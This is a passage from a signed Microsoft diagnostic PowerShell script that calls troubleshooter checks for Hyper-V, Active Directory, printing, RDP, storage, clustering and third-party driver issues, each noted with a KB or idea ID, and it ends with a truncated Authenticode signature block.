if (test-path $env:Windir\System32\BestPractices\v1.0\Models\Microsoft\Windows\Hyper-V) {
# Hyper-V BPA
if ($Global:skipBPA -ne $true) {
Run-DiagExpression .\TS_BPAInfo.ps1 -BPAModelID "Microsoft/Windows/Hyper-V" -OutputFileName ($Computername + "_HyperV_BPAInfo.HTM") -ReportTitle "Hyper-V Best Practices Analyzer"
}
}
# [Idea ID 6134] [Windows] You cannot start Hyper-V virtual machines after you enable the IO verification option on a HyperV
Run-DiagExpression .\TS_HyperVCheckVerificationKB2761004.ps1
# Check for event ID 21203 or 21125
Run-DiagExpression .\TS_CheckEvtID_KB2475761.ps1
# [Idea ID 5438] [Windows] Windows 2012 Hyper-V SPN and SCP not registed if customer uses a non default dynamicportrange
Run-DiagExpression .\TS_HyperVEvent14050Check.ps1
# [Idea ID 5752] [Windows] BIOS update may be required for some computers before starting Hyper-V on 2012
Run-DiagExpression .\TS_HyperV2012-CS-BIOS-Check.ps1
# Hyper-V KB 982210 check
Run-DiagExpression .\TS_HyperVSCSIDiskEnum.ps1
# Hyper-V KB 975530 check (Xeon Processor Errata)
Run-DiagExpression .\TS_HyperVXeon5500Check.ps1
# Checks if Windows Server 2008 R2 SP1, Hyper-V, and Hotfix 2263829 are installed if they are generate alert
Run-DiagExpression .\TS_HyperVKB2263829Check.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_DOM ---"
# DCDiag information
Run-DiagExpression .\TS_DCDiag.ps1
# Check AD Replication Status
Run-DiagExpression .\TS_ADReplCheck.ps1
# Checks if CrashOnAuditFail is either 1 or 2
Run-DiagExpression .\TS_CrashOnAuditFailCheck.ps1
# SYSVOL and/or NETLOGON shares are missing on domain controller
Run-DiagExpression .\TS_LSASSHighCPU.ps1
# SYSVOL and/or NETLOGON shares are missing on domain controller
Run-DiagExpression .\TS_SysvolNetLogonShareCheck.ps1
# Missing Rid Set reference attribute detected
Run-DiagExpression .\TS_ADRidSetReferenceCheck.ps1
# AD Integrated DNS Server should not point only to itself if it has replica partners.
Run-DiagExpression .\TS_DCCheckDnsExclusiveToSelf.ps1
# [Idea ID 3768] [Windows] New rule to verify USN Roll Back
Run-DiagExpression .\TS_USNRollBackCheck.ps1
# [Idea ID 2882] [Windows] The stop of Intersite Messaging service on ISTG causes DFSN cannot calculate site costs
Run-DiagExpression .\TS_IntersiteMessagingStateCheck.ps1
# [Idea ID 2831] [Windows] DFSR Reg setting UpdateWorkerThreadCount = 64 may cause hang
Run-DiagExpression .\TS_DfsrUpdateWorkerThreadCountCheck.ps1
# [Idea ID 2593] [Windows] UDP 389 on DC does not respond
Run-DiagExpression .\TS_IPv6DisabledonDCCheck.ps1
# [Idea ID 4724] [Windows] W32Time and time skew
Run-DiagExpression .\TS_Win32TimeTimeSkewRegCheck.ps1
# [Idea ID 4796] [Windows] MaxConcurrentApi Problem Detection Lite
Run-DiagExpression .\TS_MCALite.ps1
# [Idea ID 5009] [Windows] Weak Key Block Detection
Run-DiagExpression .\TS_DetectWeakKeys.ps1
# [Idea ID 6816] [Windows] Detect Certificate Root Store Size Problems
Run-DiagExpression .\TS_DetectRootSize.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Hotfixes ---"
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Print ---"
# Print Information Report
Run-DiagExpression .\TS_PrintInfo.ps1
# [KSE Rule] [ Windows V3] Presence of lots of folders inside \spool\prtprocs\ causes failure to install print queues
Run-DiagExpression .\TS_PrtprocsSubfolderBloat.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_RDP ---"
# Checking the presence of Citrix AppSense 8.1
Run-DiagExpression .\TS_CitrixAppSenseCheck.ps1
# Check for large number of Inactive Terminal Server ports
Run-DiagExpression .\TS_KB2655998_InactiveTSPorts.ps1
# [Idea ID 2285] [Windows] Windows Server 2003 TS Licensing server does not renew new versions of TS Per Device CALs
Run-DiagExpression .\TS_RemoteDesktopLServerKB2512845.ps1
if (test-path $env:Windir\System32\BestPractices\v1.0\Models\Microsoft\Windows\TerminalServices) {
# BPA RDP
if ($Global:skipBPA -ne $true) {
Run-DiagExpression .\TS_BPAInfo.ps1 -BPAModelID "Microsoft/Windows/TerminalServices" -OutputFileName ($Computername + "_TS_BPAInfo.HTM") -ReportTitle "Terminal Services Best Practices Analyzer"
}
}
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Storage ---"
# Detect 4KB Drives (Disk Sector Size)
Run-DiagExpression .\TS_DriveSectorSizeInfo.ps1
# [Idea ID 7345] [Windows] Perfmon - Split IO Counter
Run-DiagExpression .\TS_DetectSplitIO.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Setup ---"
# [Idea ID 1911] [Windows] NTFS metafile cache consumes most of RAM in Win2k8R2 Server
Run-DiagExpression .\TS_NTFSMetafilePerfCheck.ps1
# [Idea ID 2346] [Windows] high cpu only on one processor
Run-DiagExpression .\TS_2K3ProcessorAffinityMaskCheck.ps1
# [Idea ID 3989] [Windows] STACK MATCH - Win2008R2 - Machine hangs after shutdown, caused by ClearPageFileAtShutdown setting
Run-DiagExpression .\TS_SBSLClearPageFileAtShutdown.ps1
# [Idea ID 2753] [Windows] HP DL385 G5p machine cannot generate dump file
Run-DiagExpression .\TS_ProLiantDL385NMICrashDump.ps1
# [Idea ID 3253] [Windows] Windows Search service does not start immediately after the machine is booted
Run-DiagExpression .\TS_WindowsSearchLenovoRapidBootCheck.ps1
# [Idea ID 2334] [Windows] W2K3 x86 SP2 server running out of paged pool due to D2d tag
Run-DiagExpression .\TS_KnownKernelTags.ps1
# [Idea ID 3317] [Windows] DisableEngine reg entry can cause app install or registration failure
Run-DiagExpression .\TS_AppCompatDisabledCheck.ps1
# [Idea ID 2357] [Windows] the usage of NPP is very large for XTE.exe
Run-DiagExpression .\TS_XTENonPagedPoolCheck.ps1
# [Idea ID 4368] [Windows] Windows Logon Slow and Explorer Slow
Run-DiagExpression .\TS_2K3CLSIDUserACLCheck.ps1
# [Idea ID 4649] [Windows] Incorrect values for HeapDecomitFreeBlockThreshold causes high Private Bytes in multiple processes
Run-DiagExpression .\TS_HeapDecommitFreeBlockThresholdCheck.ps1
# [Idea ID 2056] [Windows] Consistent Explorer crash due to wsftpsi.dll
#_# Run-DiagExpression .\TS_WsftpsiExplorerCrashCheck.ps1
# [Idea ID 3250] [Windows] Machine exhibits different symptoms due to Confliker attack
Run-DiagExpression .\TS_Netapi32MS08-067Check.ps1
# [Idea ID 5194] [Windows] Unable to install vcredist_x86.exe with message (Required file install.ini not found. Setup will now exit)
Run-DiagExpression .\TS_RegistryEntryForAutorunsCheck.ps1
# [Idea ID 5452] [Windows] The �Red Arrow� issue in Component Services caused by registry keys corruption
Run-DiagExpression .\TS_RedArrowRegistryCheck.ps1
# [Idea ID 5603] [Windows] Unable to start a service due to corruption in the Event Log key
Run-DiagExpression .\TS_EventLogServiceRegistryCheck.ps1
# [Idea ID 4783] [Windows] eEye Digital Security causing physical memory depletion
Run-DiagExpression .\TS_eEyeDigitalSecurityCheck.ps1
# [Idea ID 5091] [Windows] Super Rule-To check if both 3GB and PAE switch is present in boot.ini for a 32bit OS (Pre - Win 2k8)
Run-DiagExpression .\TS_SwithesInBootiniCheck.ps1
# [Idea ID 7018] [Windows] Event Log Service won't start
Run-DiagExpression .\TS_EventLogStoppedGPPCheck.ps1
# [Idea ID 8012] [Windows] SDP-UDE check for reg key DisablePagingExecutive
Run-DiagExpression .\TS_DisablePagingExecutiveCheck.ps1
# [KSE Rule] [ Windows V3] Server Manager refresh issues and SDP changes reqd for MMC Snapin Issues in 2008, 2008 R2
Run-DiagExpression .\TS_ServerManagerRefreshKB2762229.ps1
# [KSE Rule] [ Windows V3] Handle leak in Svchost.exe when a WMI query is triggered by using the Win32_PowerSettingCapabilities
Run-DiagExpression .\TS_WMIHandleLeakKB2639077.ps1
# Checks 32 bit windows server 2003 / 2008 to see is DEP is disabled, if so it might not detect more than 4 GB of RAM.
Run-DiagExpression .\TS_DEPDisabled4GBCheck.ps1
# [Idea ID 2695] [Windows] Check the Log On account for the Telnet service to verify it's not using the Local System account
Run-DiagExpression .\TS_TelnetSystemAccount.ps1
# [Idea ID 2389] [Windows] Hang caused by kernel memory depletion due 'SystemPages' reg key with wrong value
Run-DiagExpression .\TS_MemoryManagerSystemPagesCheck.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_WinRM ---"
# Check if hotfix 2480954 installed
Run-DiagExpression .\TS_KB2480954AndWinRMStateCheck.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Cluster ---"
if ($Global:skipTScluster -ne $true) {
# FailoverCluster Cluster Name Object AD check
Run-DiagExpression .\TS_ClusterCNOCheck.ps1
# Collect Basic Cluster System Information
Run-DiagExpression .\TS_BasicClusterInfo.ps1
# [Idea ID 2169] [Windows] Xsigo network host driver can cause Cluster disconnects
Run-DiagExpression .\TS_ClusterXsigoDriverNetworkCheck.ps1
# [Idea ID 2251] [Windows] Cluster 2003 - Access denied errors during a join, heartbeat, and Cluster Admin open
Run-DiagExpression .\TS_Cluster2K3NoLmHash.ps1
# [Idea ID 2513] [Windows] IPv6 rules for Windows Firewall can cause loss of communications between cluster nodes
Run-DiagExpression .\TS_ClusterIPv6FirewallCheck.ps1
# [Idea ID 5258] [Windows] Identifying Cluster Hive orphaned resources located in the dependencies key
Run-DiagExpression .\TS_Cluster_OrphanResource.ps1
# [Idea ID 6519] [Windows] Invalid Class error on 2012 Clusters (SDP)
Run-DiagExpression .\TS_ClusterCAUWMINamespaceCheck.ps1
# [Idea ID 6500] [Windows] Invalid Namespace error on 2008 and 2012 Clusters
Run-DiagExpression .\TS_ClusterMSClusterWMINamespaceCheck.ps1
}
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_3rd party ---"
# [Idea ID 7521] [Windows] McAfee HIPS 7.0 adds numerous extraneous network adapter interfaces to registry
Run-DiagExpression .\TS_McAfeeHIPS70Check.ps1
# [Idea ID 986] [Windows] SBSL McAfee Endpoint Encryption for PCs may cause slow boot or delay between CTRL+ALT+DEL and Cred
Run-DiagExpression .\TS_SBSL_MCAfee_EEPC_SlowBoot.ps1
# [Idea ID 3181] [Windows] Symantec Endpoint Protection's smc.exe causing handle leak
Run-DiagExpression .\TS_SEPProcessHandleLeak.ps1
# Symantec Endpoint Protection MR1 or MR2 check
Run-DiagExpression .\TS_SymantecEPCheck.ps1
# Check for Sophos BEFLT.SYS version 5.60.1.7
Run-DiagExpression .\TS_B2693877_Sophos_BEFLTCheck.ps1
# [KSE Rule] [ Windows V3] HpCISSs2 version 62.26.0.64 causes 0xD1 or 0x9E
Run-DiagExpression .\TS_HpCISSs2DriverIssueCheck.ps1
# Symantec Intrusion Prevenstion System Check
Run-DiagExpression .\TS_SymantecIPSCheck.ps1
# [Idea ID 2842] [Windows] Alert Engineers if they are working on a Dell machine models R910, R810 and M910
Run-DiagExpression .\TS_DellPowerEdgeBiosCheck.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- Diag Phase:TS_obsolete W2K3/XP ---"
# [Idea ID 2446] [Windows] Determining the trimming threshold set by the Memory Manager
Run-DiagExpression .\TS_2K3PoolUsageMaximum.ps1
# [Idea ID 7065] [Windows] Alert users about Windows XP EOS
#_# Run-DiagExpression .\TS_WindowsXPEOSCheck.ps1
}
# Hotfix Rollups
Run-DiagExpression .\DC_HotfixRollups.ps1
$stopTime_AutoAdd = Get-Date
$duration = $(New-TimeSpan -Start $startTime_AutoAdd -End $stopTime_AutoAdd)
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object "*** $(Get-Date -UFormat "%R:%S") DONE (Dur: $duration) TS_AutoAddCommands_CTS.ps1 SkipTS: $Global:skipTS - SkipBPA: $Global:skipBPA"
# SIG # Begin signature block
# MIIoVAYJKoZIhvcNAQcCoIIoRTCCKEECAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDyBN4/YdkWaklP
# lRKXr6qvi2As2bgK/F5HodPo+xBMyqCCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiUwghohAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIByw
# 5L3h/wqQw0sAJipe/Jkq0fN2Ss6mqRiqGHg9gwU5MEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAMEBW++/RM/BNkUhTYloQW4smU1JYFKZBBA7K
# aA9t6Ffwd2BrOqYQTq5R9xfSXTpbuwP0+FLbjAKEBvdNknqkPeurJZvaplTkeSin
# 0eZ95Vm9Y61LSjBqmHeRFInx5ZLJ2hM7vdYlqfDALdjbQlzyvi1DHWs1fgyIt7B1
# GNZWP5CgKnVfnh3DJDspNdfRUCvFFfsYYiyC1O9sUcUHkXMTAg+ufDsKXGxHSmaf
# lU5za/bxt5YbZW5lBGj/AjOF4+TMcPb6PnO8C6BOBA92857antQgmlZAoZCa7Czl
# 0Ogsj33MEb2NrExhvYa7FcifIPgwA/ezzDHAJqi7eED3rw7Fn6GCF68wgherBgor
# BgEEAYI3AwMBMYIXmzCCF5cGCSqGSIb3DQEHAqCCF4gwgheEAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCDVsUrVTGXY/JhSoWxsJqn9zYg4RZ/1ayNs
# m6rObBNs6gIGZutC6/SmGBIyMDI0MTAyODExNDA0MS42MVowBIACAfSggdmkgdYw
# gdMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
# ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT
# JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMe
# blNoaWVsZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3Nv
# ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIR/jCCBygwggUQoAMCAQICEzMAAAH+0KjC
# ezQhCwEAAQAAAf4wDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# UENBIDIwMTAwHhcNMjQwNzI1MTgzMTE4WhcNMjUxMDIyMTgzMTE4WjCB0zELMAkG
# A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx
# HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z
# b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046NDAxQS0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC8
# vCEXFaWoDjeiWwTg8J6BniZJ+wfZhNIoRi/wafffrYGZrJx1/lPe1DGk/c1abrZg
# dSJ4hBfD7S7iqVrLgA3ciicj7js2mL1+jnbF0BcxfSkatzR6pbxFY3dt/Nc8q/Ts
# 7XyLYeMPIu7LBjIoD0WZZt4+NqF/0zB3xCDKCQ+3AOtVAYvI6TIzdVOIcqqEa70E
# IZVF0db2WY8yutSU9aJhX0tUIHlVh34ARS11+oB2qXNXEDncSDFKqGnolt8QqdN1
# x8/pPwyKvQevBNO1XaHbIMG2NdtAhqrJwo5vrfcZ9GSfbXos4MGDfs//HCGh1dPz
# VkLZoc3t7EQOaZuJayyMa8UmSWLaDp23TV5KE6IaaFuievSpddwF6o1vpCgXyNf+
# 4NW1j2m8viPxoRZLj2EpQfSbOwK5wivBRL7Hwy5PS5/tVcIU0VuIJQ1FOh/EncHj
# nh4YmEvR/BRNFuDIJukuAowoOIJG5vrkOFp4O9QAAlP3cpIKh4UKiSU9q9uBDJqE
# ZkMv+9YBWNflvwnOGXL2AYJ0r+qLqL5zFnRLzHoHbKM9tl90FV8f80Gn/UufvFt4
# 4RMA6fs5P0PdQa3Sr4qJaBjjYecuPKGXVsC7kd+CvIA7cMJoh1Xa2O+QlrLao6cX
# sOCPxrrQpBP1CB8l/BeevdkqJtgyNpRsI0gOfHPbKQIDAQABo4IBSTCCAUUwHQYD
# VR0OBBYEFG/Oe4n1JTaDmX/n9v7kIGJtscXdMB8GA1UdIwQYMBaAFJ+nFV0AXmJd
# g/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9z
# b2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El
# MjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6
# Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGlt
# ZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0l
# AQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUA
# A4ICAQCJPg1S87aXD7R0My2wG7GZfajeVVCqdCS4hMAYgYKAj6yXtmpk5MN3wurG
# wfgZYI9PO1ze2vwCAG+xgjNaMXCKgKMJA4OrWgExY3MSwrNyQfEDNijlLN7s4+Qw
# DcMDFWrhJJHzL5NELYZw53QlF5nWU+WGU+X1cj7Pw6C04+ZCcsuI/2rOlMfAXN76
# xupKfxx6R24xl0vIcmTc2LDcCeCVT9ZPMaxAB1yH1JVXgseJ9SebBN/SLTuIq1OU
# 2SrdvHWLJaDs3uMZkAFFZPaZf5gBUeUrbu32f5a1hufpw4k1fouwfzE9UFFgAhFW
# RawzIQB2g/12p9pnPBcaaO5VD3fU2HMeOMb4R/DXXwNeOTdWrepQjWt7fjMwxNHN
# lkTDzYW6kXe+Jc1HcNU6VL0kfjHl6Z8g1rW65JpzoXgJ4kIPUZqR9LsPlrI2xpnZ
# 76wFSHrYpVOWESxBEdlHAJPFuLHVjiInD48M0tzQd/X2pfZeJfS7ZIz0JZNOOzP1
# K8KMgpLEJkUI2//OkoiWwfHuFA1AdIxsqHT/DCfzq6IgAsSNrNSzMTT5fqtw5sN9
